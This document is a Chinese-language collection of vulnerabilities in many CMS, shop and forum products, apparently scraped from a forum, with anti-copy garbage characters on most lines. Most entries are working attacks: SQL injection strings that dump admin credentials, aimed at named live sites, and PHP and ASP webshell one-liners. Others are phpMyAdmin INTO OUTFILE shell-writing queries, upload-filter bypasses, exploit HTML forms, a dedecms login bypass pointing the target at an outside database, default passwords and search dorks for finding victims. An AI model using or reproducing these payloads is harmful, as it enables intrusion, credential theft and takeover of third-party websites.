启航企业建站系统 cookie注入漏洞通杀所有版本# M. L% d! s; k* v8 ^
( P; q! \" ]5 L直接上exploit:) Q: a2 A# P7 \( A
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));1 E) P7 z0 s0 b7 T1 f$ n9 U+ O. s
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
; m+ A, [$ E5 g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& Y- [ ~+ C8 @4 h1 EAsprain论坛 注册用户 上传图片就可拿到webshell+ [ @9 d) X1 i* p
% x0 A, P0 L$ v5 I; j8 B
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
& Y, p4 S" g5 f3 p8 r1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
2 b/ d" e% a6 u2.gif 为一小图片文件,一定要小,比如qq表情图片; J* f/ d8 M1 x& S. w2 V g& b7 J: |
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用0 F1 n X7 n( N8 {: X# D/ m6 C
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了4 P2 X* o% r6 m8 D0 r
5.q.asp;.gif* i" V/ y0 h. q" i0 g9 ~ v
google:Powered by Asprain- Z0 P6 u* [5 ]6 j: W
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
m7 g4 y$ Y& C& H# f! a: i/ ]% P2 z N8 G
ShopNum1全部系统存在上传漏洞。" r' D8 c5 Q4 C# Z
* M3 Q/ \+ l1 T: M3 E
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
! n6 \3 ]: b4 T/ }- Q- q, c按说明 提示登录后台。。) k1 N" l7 Z5 ?0 @$ e# t# b( y1 [" p
在后台功能页面->附件管理->附件列表/ e! k! U/ j1 Q5 V, l5 F& n
可以直接上传.aspx 后缀木马3 l2 r) ~0 c( g" X6 [4 S
http://demo.shopnum1.com/upload/20110720083822500.aspx
: }# Y) G5 j# K2 Y" |$ f--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 e4 S+ j0 F6 ^/ \+ p
P: O3 W, b: ^1 R7 `+ ^牛牛CMS中小企业网站管理系统 上传漏洞
) G. U6 a, u1 i# _) k+ X8 Y% h3 c4 Q% d# Q" k2 S
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
# V8 ^# Q, C9 P9 W( @后台:admin/login.asp
; G; T9 c% j: \" V1 Sewebeditor 5.5 Nday
; D8 @* q0 r, T( W2 uexp:/ J& l% ]. X0 ~- L3 ^) J1 I5 M0 \
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
. h4 R5 B7 O2 X: v4 j<input?type=file?name=uploadfile?size=100><br><br>?6 J8 z% `5 C/ d: ^4 S6 q
<input?type=submit?value=upload>?
- \* N5 p& p6 J, b! r- ]</form>: F; }/ J0 m2 y& t1 P$ h
ps:先上传小马.
7 m8 R2 l+ y3 B' Y! |inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏6 t: R8 S4 g, k
) v. ]( R% e) Q6 J7 L) x* e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: H4 E$ K# g8 r
% D* t" N0 H% \% x
YothCMS 遍历目录漏洞7 b; `: e: N: A* Z! Q) D2 C6 ~0 v9 Y c
0 \. `' e2 {0 }9 X2 b
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。" l( c3 x& N$ K2 B! i5 [
默认后台:admin/login.asp; ]9 q1 i8 |: W: b7 A& @3 L: [
遍历目录:! Z# o7 u# M" o9 u
ewebeditor/manage/upload.asp?id=1&dir=../; w9 u+ M9 u! _6 j
data:
. Y" c( e& p& f! {. d6 lhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
9 P5 f: c- p# r2 T+ Y0 P2 \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' [. b: s# b+ @
2 f( L; x7 B1 F7 ?5 \9 hNet112企业建站系统 1.0
& [* ?: y* r. x/ A1 z
) O4 g& T5 J8 t1 j, t! s源码简介:( y" M, e( n$ o+ I, p
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。! j3 _7 F8 O0 a* z
添加管理员:
; p' \2 l" L; h3 [7 Shttp://www.0855.tv/admin/admin.asp?action=add&level=2
1 h( N6 F) V3 S% u+ F& ^其实加不加都不是很重要,后台文件都没怎么作验证。
- l2 P8 _9 e5 h* v6 ~上传路径:
3 d7 F6 F! m8 a8 ^! w2 Zhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2005 O" E0 I" e5 L5 u2 g* X8 t2 C% w' o
http://www.0855.tv/inc/Upfile.asp?Stype=2% Z( O/ Y0 U4 I6 x& [- S
怎么利用自己研究。
! c$ G) V; J5 P L8 S# I5 Q遍历目录:
" u$ S# R1 E* _8 mhttp://www.0855.tv/admin/upfile.asp?path=../..# x% v1 s" G8 L1 z' K, m6 V
如:
3 P: ]+ F# x& p# Xhttp://www.0855.tv/admin/upfile.asp?path=../admin
7 r3 E6 e4 y d3 D9 P1 s) A' `http://www.0855.tv/admin/upfile.asp?path=../data
( W: e) d. F) x--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* p: O7 r# B: j0 k Z& J5 L3 j# |; t% B, A& K) C9 K
易和阳光购物商城通杀 上传漏洞4 v% P$ e0 T, F/ ~) D# Q, z
/ J1 x! H( } R) l4 }7 C8 C% ~前提要求是IIS6.0+asp坏境。" b5 l( A" g: `' ]
漏洞文件Iheeo_upfile.asp
, j: s5 |$ R( x, H# G: s2 A过滤不严.直接可以iis6.0上传0 s9 c* c0 { m
把ASP木马改成0855.asp;1.gif
! \, g- m7 `- A: |直接放到明小子上传 c* Z* U( u0 G U
Google搜索:inurl:product.asp?Iheeoid=- H0 ^6 b1 H# r- x3 y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" j5 ?9 }+ k5 _% v0 E3 [9 `
: h9 d. v. \5 N5 f6 ?3 |6 i J: H% [phpmyadmin后台4种拿shell方法
! W. s, {! n+ p6 R& e! W* ~( i( w9 _/ K+ S
方法一:
/ v# H8 c' `7 Q ~7 z- T7 n' mCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );, d5 x% _2 ]0 V& w* p
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); d* ~- d0 S, R# w
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
( A l1 [7 R9 @----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php0 R0 A" y R: R5 \! S0 T- _1 W3 z
一句话连接密码:xiaoma
, W/ w q* D% s, t# ]方法二:
G) J- i" F2 \Create TABLE xiaoma (xiaoma1 text NOT NULL);
; O7 K: p P( R0 s: i! { ?Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
7 p, L+ Q$ ~$ {; N. M0 B8 [select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';7 T8 z9 t) n) K; z9 w
Drop TABLE IF EXISTS xiaoma;
5 {( B! i8 `7 G/ `) m' Y1 U方法三:" g4 o/ r3 N: `' A. L; g7 Z5 R" p+ t
读取文件内容: select load_file('E:/xamp/www/s.php');
! `" C2 Y b8 z6 a! m写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'0 N! z0 I- G: L4 J# w6 q6 F' P9 d
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
1 Y+ e' x! K. ]: n方法四:
4 r3 J& c7 {7 ] T" Qselect load_file('E:/xamp/www/xiaoma.php');
# G: ^8 l L/ Q" o* dselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'- E+ H& v& j- n' k8 d9 D
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir' U P, z3 `% J5 s6 G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 y+ s C4 {% v" F- ]
0 I; E+ D, Y: B) {! L7 [6 r% p
传信网络独立开发网站源码0day漏洞
. e H5 H) I# Q% d- v! K- D. T o
3 I O3 G: c" V后台system/login.asp M: z) H# V( P5 h& z
进了后台有个ewebeditor+ _! \3 A( z _9 X6 s a
Google 搜索inurl:product1.asp?tyc=4 J& ~( F$ e6 Q! {4 t% p& c
编辑器漏洞默认后台ubbcode/admin_login.asp. y5 f P' r) r/ m4 u
数据库ubbcode/db/ewebeditor.mdb- h, l* Z9 E) c$ p$ c" y) i! Y* A
默认账号密码yzm 111111
0 H ]# V& O3 A
7 U$ ?: S# W, B拿webshell方法! S3 d; l/ W% n; V. H$ ~$ I$ f
登陆后台点击“样式管理”-选择新增样式 * o1 n3 l* G6 y5 R& u5 M
样式名称:scriptkiddies 随便写 6 G) v- d, c: j" v: \$ s: D
路径模式:选择绝对路径 ( s: V! ?# [* F8 R, I4 h
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
! `1 Q. ^2 y' V2 v& m1 i图片类型比如就是我们要上传的ASP木马格式
( y3 N- c$ m2 V/ ^2 j上传路径:/, ^; z* Y/ E: y$ r2 m2 Y
图片限制:写上1000 免的上不了我们的asp木马: j: S% k8 R* z
上传内容不要写$ b7 E# F1 z; d2 | G) h
可以提交了
1 L# `: M: `! I; h- _; c1 c5 L# B+ d样式增加成功!
$ H- R/ y, k0 K2 y U. X$ ^6 i返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
. s, b9 W1 ]4 Z! O8 {% C按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置3 x; G8 X E( G. t! o6 s
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
, m3 P' W+ Z: L; @上ASP木马 回车 等到路径9 z8 S& w4 R) X* c: @% L/ F6 w( j
_" I. G/ h6 a3 W' o
后台:system/login.asp
% B! l( e8 d# W3 ^$ r+ OExp:3 D+ i4 W! e$ W
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
" P8 C1 Y, W& n测试:( r7 X5 M$ a% t# p
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
" {2 r! g1 @; ^' \http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master1 s% {8 `: g2 S1 k2 {
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% A- b( {% T/ [5 {/ t3 M/ \8 x' u6 k" e% J% G! n' t8 L
foosun 0day 最新注入漏洞5 Y. f/ }& Y9 P+ p0 q9 W
% S/ _" `2 f; m6 @0 T漏洞文件:www.xxx.com/user/SetNextOptions.asp
, |/ }6 [6 W! U' J6 M& g; {利用简单的方法:5 K4 u0 J* X5 l# Q. Z
暴管理员帐号:8 O* x$ M$ z9 G& @3 E+ v$ b* f4 b- k
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
+ ?, j9 m4 g1 |! G/ g1 _暴管理员密码:
% m+ I" s. @# d5 Hhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
! h, l, L8 p! e7 S% S7 [4 ~" ?: b--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 ~+ n, d2 O0 y2 L$ V- W+ N) j1 u, @0 s7 |
网站程序的版权未知!
2 @& |' S3 \" k. V) q5 v
, T7 B9 @) ?" n默认网站数据库:( c0 D3 q. O3 R1 }; C7 W4 u Y
www.i0day.com/data/nxnews.mdb
% V$ ~$ \, k1 _/ F7 t. n# lewebeditor 在线编辑器: {2 K% ]3 M4 R6 \
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
9 P$ K# ^2 K7 d0 O, z; V d- s登录地址:ewebeditor/admin_login.asp7 I* E3 X/ H* E! i
默认密码:admin admin
1 L" G% w- s) J& f+ N0 X3 p) J登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data, U$ w- T0 H. z9 e
5 k2 z) p5 c% L& I# c! d. \Sql注入漏洞:
- r$ e; j6 i' f7 v; F6 qhttp://www.i0day.com/detail.asp?id=12
8 \" W# [! X. |3 Y, z% Q4 C2 r. jexp:
( P- [4 O6 K4 f. W0 E% {$ L' Runion select 1,admin,password,4,5,6,7,8 from admin( Y% G3 M0 R" P3 V0 Q
爆出明文帐号/密码
# n5 ]+ n( u9 H1 m' S# p9 S
2 N9 b4 `4 h0 {$ n上传漏洞:
. f2 P$ R" z U: g& ?2 Z$ j后台+upfile.asp
# F% ~* B- f; U. N; G如:8 X! M5 U7 E. Y# }( L" S; C
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。# j7 E4 b6 u2 q |) _
shell的地址:网址+后台+成功上传的马
) B) x' s$ D" O9 |" v' kgoogle:inurl:news.asp?lanmuName=
6 k8 ^% F0 a" W& z+ ~% r2 p------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: q/ b2 ~& [0 `3 ~+ G% E( |* K7 h ~6 _+ ~0 T
dedecms最新0day利用不进后台直接拿WEBSHELL3 ^) _1 u& s ]$ l F/ Q
( y; s1 g" P' a8 ]" p6 J! b拿webshell的方法如下:/ F# ` I9 E' R, S) V) r3 O
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.! {& `2 J* I4 J
前题条件,必须准备好自己的dede数据库,然后插入数据:5 `- P- O, o: {5 ]
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
5 }+ F3 z* x% b8 L" Y. P6 x2 g- M
0 r/ K2 F. Y* R# O5 c0 t* X再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。( {/ A7 L/ P5 N+ X% }; v. k
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">3 T: F% Q& ^; s' Z
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
$ _1 ]5 K9 z1 y/ r0 Q<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
4 M) b. t( u6 [% @ y, J; g<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
7 M( ~$ x& V$ v- i8 D+ j4 C1 D<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
- ?. L4 s& s: M: t<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
1 M& j5 G- l6 i<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
- H) s) K7 t* H7 J4 u<input type="text" value="true" name="nocache" style="width:400">' N8 u1 m- C" i
<input type="submit" value="提交" name="QuickSearchBtn"><br />; H' F/ ^5 ~1 i+ B
</form>, n0 s- X! ~( }9 l
<script>9 C) L) ?" e! h- F K. s
function addaction()
/ d' x& n( z8 I- g Q{/ j9 D: b$ k L7 j& H5 f
document.QuickSearch.action=document.QuickSearch.doaction.value;; S' h& `8 a+ r, z& R% t' \
}( B( S5 A: ]& {$ {
</script>) r' X( Z! \& X" K, n
-----------------------------------------------------------------------------------------------------------------------------------------------; v2 O" a9 t/ f2 N' j" z
9 S: f. ~7 q, B U8 E0 y
dedecms织梦暴最新严重0day漏洞
- Z! C' M3 o$ H( Q" J7 e7 \* nbug被利用步骤如下:
3 V _' H/ O s3 e+ Z X, r; Fhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
% A. v; i1 j, K/ j7 v把上面{}上的字母改为当前的验证码,即可直接进入网站后台。 c2 F' R" e5 O, R2 @+ e- s! A( d
-------------------------------------------------------------------------------------------------------------------------------------------4 F: f& M. b$ r7 a$ Y0 r& b
$ \6 y. c- ?+ M7 z, J. Y
多多淘宝客程序上传漏洞 ; q% O( @2 U+ q# T# O: m
漏洞页面:+ {% A$ J1 D/ B, P6 V5 q+ `
admin\upload_pic.php- U* u6 ?: g; a
传送门:
% A. u' U% m3 f* H7 o1 {% `' Rhttp://www.www.com/admin/upload_pic.php?uploadtext=slide15 P' h6 k2 i1 b$ d- M- p5 U- b& d
PS:copy张图片马 直接 xxx.php 上传抓包地址!, p7 I7 o5 {$ u
------------------------------------------------------------------------------------------------------------------------------------------------------
+ h8 ]* A7 Z/ Q1 ^; x4 k. l9 R# z$ d- D4 W: z: m! T* v
无忧公司系统ASP专业版后台上传漏洞7 G. R8 R9 m# ?% l4 N
漏洞文件 后台上传
z9 Y% h2 K1 u6 W) Dadmin/uploadPic.asp
6 k" z8 W1 m, E+ T3 c漏洞利用 这个漏洞好像是雷池的
$ [! b+ T+ y" a- K3 jhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1 \+ t/ z! `3 I( N
等到的webshell路径:# p2 j) p2 G: O, S& H% C# J
/UploadFiles/scriptkiddies.asp;_2.gif' O/ P+ s+ z7 \' c
---------------------------------------------------------------------------------------------------------------------------------------------------
. U4 a4 K: ]5 a" N0 C) e! ^% u; Y
1 R% ?2 u6 g9 j" o住哪酒店分销联盟系统2010
6 ?1 j7 J7 j. |% KSearch:4 R$ v5 U+ g$ R* ]# l
inurl:index.php?m=hotelinfo9 ^4 K: M# Y9 ]. P# w9 r: N$ P
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin) i$ b, u% r5 |+ u+ `; y
默认后台:index.php?m=admin/login# R- I! Y/ _: z: l5 E- [2 F
--------------------------------------------------------------------------------------------------------------------------------------------------
8 T' }6 H5 e% W& p4 d* F& A# {; h& j# Y
inurl:info_Print.asp?ArticleID=
o# }2 Q) Y" D7 `8 S) r后台 ad_login.asp
3 T) D; k; _: M$ x6 Q) {7 g! t爆管理员密码:; @; a; \7 A2 }
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin& a+ B4 u5 Z9 k; ~, Y. E; x9 w
------------------------------------------------------------------------------------------------------------------------------------------------------------
* U$ ]0 `# _/ T: U- v* q# S; s: m, S. |9 o( ]6 W$ e0 P
搜索框漏洞!
( o" O% s) x0 k%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
& F8 {, W6 B# ^! p8 }0 w--------------------------------------------------------------------------------------------------------------------------------------------------------
3 d0 j( N5 c+ M8 N, r( ^, I& _
4 ~/ F5 |* h* K7 ]" |关键字:
& ?6 U& C) k0 G T3 tinurl:/reg_TemletSel.asp?step=2+ p0 X) x- l( U1 p
或者7 I& {3 Q9 H! q' i/ q# Q7 S
电子商务自助建站--您理想的助手6 w, k# r# ?; G6 f. I
-------------------------------------------------------------------------------------------------------------------------------------------------+ p. W; u9 @8 k
8 n* p0 I" V% e' H$ e5 A$ f2 diGiveTest 2.1.0注入漏洞
* j, B, I5 i) b' C; s+ M6 g3 \( MVersion: <= 2.1.06 k9 D! c$ i# q& g, G, K8 K9 w
# Homepage: http://iGiveTest.com/
; W- |3 V u! F3 A谷歌关键字: “Powered by iGiveTest”% s" R* X, F' H/ J; |7 c- j
随便注册一个帐号。然后暴管理员帐号和密码
! F% E$ v( D& phttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (16 G. R5 N9 T4 g O( j
------------------------------------------------------------------------------------------------------------------------------------------------+ T! _# S; \8 q- F, o& ]
& c' i3 w5 Q) r8 j3 t, P
CKXP网上书店注入漏洞) u( J1 c* A9 w$ I5 v
工具加表:shop_admin 加字段:admin
: _) N* p/ `/ K C' M5 |后台:admin/login.asp
$ e! t! D# k9 v& P7 H登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
* }6 c7 ~+ w3 d! E% Finurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
# n* r" g# C0 h--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 j" P+ l z5 ~) \- J6 P2 E3 r; c" u) A
段富超个人网站系统留言本写马漏洞8 P$ V: f& O; i3 k1 i
源码下载:http://www.mycodes.net/24/2149.htm
+ B2 F7 A6 T4 x) Caddgbook.asp 提交一句话。
( _- \2 Y* _1 R9 }/ I x; u) A连接: http://www.xxxx.tv/date/date3f.asp
^7 o& s7 g! E; ]3 |google:为防批量,特略!
& G) X* @* m% |1 O' E-------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 @; A3 A; Z* }9 g" n+ _6 k
" J8 a) S) J& F+ W0 b0 @2 J! E' G) n" M智有道专业旅游系统v1.0 注入及列目录漏洞1 k6 O6 F2 y% ]; L; e
默认后台路径:/admin/login.asp
# ~1 Q! M, Z& r0 D2 a默认管理员:admin8 F7 i# p4 g3 @5 G f
默认密码:1234562 j3 t/ D( n8 n5 |& ^( t" [- N
SQL EXP Tset:2 n! h- ?& a( g9 O: }7 }
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
' l0 p- {# r6 j: r/ w" G) {------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 K0 i# M' K7 [8 |( ^! F
3 d' k# |, `: ?( Uewebeditor(PHP) Ver 3.8 本任意文件上传0day
! r2 L4 T/ u$ E: G% SEXP:
8 f" Q( J5 ?/ _* ^8 }1 \$ {<title>eWebeditoR3.8 for php任意文件上EXP</title>% X% `, B4 O; n. g$ l' F ]3 X1 a
<form action="" method=post enctype="multip
: H4 r+ A: d) `art/form-data"> 3 n( d0 M0 u7 p8 v5 x( m
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> ) S0 l3 Z! n% F9 [$ H, {
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
! w. _) ~' X9 P% K3 ?# ^7 u& L9 A<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 0 w7 c" t/ d6 D- E! g& P
file:<input type=file name="uploadfile"><br>
2 X8 ^0 x7 `+ O$ W- G9 r9 E+ o<input type=button value=submit onclick=fsubmit()>
: S+ B+ O, ?, u& L8 K</form><br>
9 [& V9 g) u# E' }4 S8 U<script> : V; E0 V; v5 C
function fsubmit(){ 9 s/ d" T& {0 ?
form = document.forms[0]; 8 X6 o9 I. t2 {4 b
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
5 O2 ?3 `4 Z+ C8 L' falert(form.action);
* q! V; o3 w1 R/ X Zform.submit();
& [9 ]2 w: B0 p4 o' V0 X9 Q}
( p4 R1 N$ y! C" Y- E</script> B' n. @" M4 h# }$ b i1 L
注意修改里面ewebeditor的名称还有路径。6 N, Q+ L( S/ P. m: t% N
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 R3 Z$ i, e+ O7 Z
# }( Y( E8 r8 n提交’时提示ip被记录 防注入系统的利用, |5 J. R; V& X* C! r* h: R# ~* ^
网址:http://www.xxx.com/newslist.asp?id=122′
3 p' _/ N* _ H! {0 I提示“你的操作已被记录!”等信息。
3 {2 h, Z% A% D# R利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
Q3 M& u! Z% H( c, O/ R-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ c: @4 E3 k8 G6 I( w! j
" ^/ \9 j. f9 T8 y5 E西部商务网站管理系统 批量拿shell-0day
5 e4 K" I, c! k& d3 l4 E8 D$ O这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 8 X1 \7 L( j: m" Q
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
5 f7 q4 T0 q6 s: |2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
0 F& q; _! n7 t; r |3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂/ P% `8 ~ ?6 m6 o% J8 b
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 e1 n' J5 `4 O1 l/ A
3 O* l) _& Q9 v/ @7 G' e" zJspRun!6.0 论坛管理后台注入漏洞
* J; R$ f- _: q1 }
9 ~( F: `- ~6 ^( c* W% Y3 ^' iSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
6 z! E8 W+ X' h& W- b$ C% e& t& |, rJspRun!6.0
) M* |. E6 A' j漏洞描述:9 n3 C% e6 b. a" V
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
J3 m. m1 B9 ~" L$ p在处理后台提交的文件中ForumManageAction.java第1940行2 F4 c) |5 B! l/ g* P/ G7 ?! o" S
String export = request.getParameter("export");//直接获取,没有安全过滤6 b0 ^8 b8 N2 w ^% U- D, P
if(export!=null){
/ F; l8 D; H8 i' S8 VList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...( u: Y/ G; G" d* x) H
if(styles==null||styles.size()==0){0 j Z; c! x2 t( G3 O, T0 x
<*参考
) A1 Q+ U3 f- H1 r; U/ P$ Cnuanfan@gmail.com
6 {1 P, F+ o* m4 N*> SEBUG安全建议:
6 @+ w* E/ H8 k* Dwww.jsprun.net
* ]; N6 _6 `5 f, o(1)安全过滤变量export
% e& }- t& E: y( x; s7 i(2)在查询语句中使用占位符
7 x" Y- @6 d/ w" @/ p------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- e( A! @$ g: n8 P/ {
5 A# k! Z" y; G$ }2 h; E/ \/ e
乌邦图企业网站系统 cookies 注入
7 P$ M- t! ?. j: S# ~5 X' D3 O" D
程序完整登陆后台:/admin/login.asp
" i* \6 d5 v4 j2 J& l默认登陆帐号:admin 密码:admin888) e4 P Y5 `2 @4 h9 Q
语句:(前面加个空格)! U0 f7 P$ \$ Z/ X2 Y1 C8 j9 v0 L
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
|+ ]& u% W5 r5 E- Q) X或者是16个字段:
5 P x* X3 o5 t0 g/ s4 I1 qand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
6 p- I: m! T5 R7 y% B! C9 u爆不出来自己猜字段。; N/ w% n# |6 I% m1 V2 R
注入点:http://www.untnt.com/shownews.asp?=88" x; k: @& h, c( t
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
2 u$ |. C' U! M8 m9 O/ Q关键字:
$ a p9 I& w& _3 R V4 w1 \inurl:shownews?asp.id=' ~5 A& {. K% p# I8 w% }+ k5 q
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, \5 X1 x' _; G0 { D' g
3 V& i2 N9 m' K/ E3 |4 H4 N0 E# O7 j
CKXP网上书店注入漏洞
R3 S f, \8 U6 n) ?- Z. o; y1 u( w* C& {% i8 M
工具加表:shop_admin 加字段:admin8 d) \, x. z7 |. r4 O2 P
后台:admin/login.asp ! ?) C+ u" K8 q8 a7 _" I2 A, ^
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
\" G2 D+ X, C3 Winurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
* ^( ~5 e$ g, n7 Y, p---------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 S2 S% x& }. t# H2 v% m
5 U; O- ~' P! R+ [& IYxShop易想购物商城4.7.1版本任意文件上传漏洞2 U9 T: C6 `2 a; G. | T
# F% z" y7 M! w* q* m0 xhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
: u# \& X% ?7 F( g跳转到网站根目录上传任意文件。; w0 O; J& g9 q0 h( b
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
